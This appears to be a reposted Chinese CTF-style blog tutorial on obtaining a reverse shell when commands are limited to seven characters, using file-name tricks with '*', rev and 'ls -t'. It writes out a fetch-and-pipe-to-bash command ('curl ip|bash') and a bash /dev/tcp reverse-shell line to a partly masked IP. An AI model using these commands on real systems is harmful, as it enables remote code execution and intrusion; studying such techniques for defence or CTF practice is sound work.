当前位置:网站首页>限制命令长度如何反弹shell

限制命令长度如何反弹shell

2022-08-06 07:25:55清风--

问题:限制命令在7句以内如何反弹shell

先来看一个命令

直接输入一个*,发现输出了hello_qf.来看一下如何实现

在一个新的目录中,我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

于是输出了hello_qf.

那我们再来看一下使用命令ls -l

有两个方法:

方法一:

利用rev把字符串反过来。

rev作用:把字符串头变成尾,尾变成头翻转

test的内容

this is test

开始操作:

>dir原因

把 a 和 b 写到 c 里面

dir a b>c

执行了*>v,就是

dir l- sl > v

>v使用字母v的原因

*v>x就是

rev v

方法二:

待会使用反弹shell就是用这个方法,利用ls -t 的时间顺序来实现执行命令

abde994abc1391e112c0a65c808d2eae.png

反弹shell:

首先要确立一个反弹shell的语句,因为我们要设置为这个文件名,所以要尽量简单,而且尽量少有那种奇怪的符号。于是确立这个语句:

curl ip/shell.txt|bash

shell.txt的内容就是反弹shell

bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

但是这里面有一个'/'要避免,那我们就把这个shell.txt设置成默认页面,然后命令变成:

curl ip|bash

 

以上是命令

到服务器看一眼:

成功反弹shell

原网站

版权声明
本文为[清风--]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_64201116/article/details/126178905

随机推荐